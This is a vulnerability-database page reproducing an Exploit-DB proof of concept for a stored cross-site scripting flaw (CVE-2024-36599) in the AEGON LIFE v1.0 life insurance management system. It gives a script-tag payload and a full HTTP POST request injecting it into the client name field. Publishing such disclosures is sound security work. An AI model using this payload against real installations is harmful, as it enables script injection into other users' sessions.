Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAslam Anwar MahimkarEDB-ID:52042
HistoryJun 14, 2024 - 12:00 a.m.

AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting (XSS)

2024-06-1400:00:00
Aslam Anwar Mahimkar
www.exploit-db.com
98
aegon life v1.0
cross-site scripting
web application
linux
cve-2024-36599
burp suite
payload
exploit title
vendor homepage
software link

7.4 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.0%

JSON
# Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web application
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36599

# Description:
----------------

A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.


# Payload:
----------------

<script>alert(document.domain)</script>


# Attack Vectors:
-------------------------

To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.

# Burp Suite Request:
----------------------------

POST /lims/insertClient.php HTTP/1.1
Host: localhost
Content-Length: 30423
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/lims/addClient.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
Connection: close

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="client_id"

1716051159

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="client_password"

password

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="name"

<script>alert(document.domain)</script>

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"

Content-Type: application/octet-stream


ÿØÿà

Related

zdt 1
packetstorm 1
nvd 1
cvelist 1
cve 1
vulnrichment 1
zdt
zdt
AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting Vulnerability
2024-06-14 00:00:00
packetstorm
packetstorm
AEGON LIFE 1.0 Cross Site Scripting
2024-06-14 00:00:00
nvd
nvd
CVE-2024-36599
2024-06-14 18:15:27
cvelist
cvelist
CVE-2024-36599
2024-06-14 00:00:00
cve
cve
CVE-2024-36599
2024-06-14 18:15:27
vulnrichment
vulnrichment
CVE-2024-36599
2024-06-14 00:00:00

7.4 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.0%

JSON
Related for EDB-ID:52042
zdt1packetstorm1nvd1cvelist1cve1vulnrichment1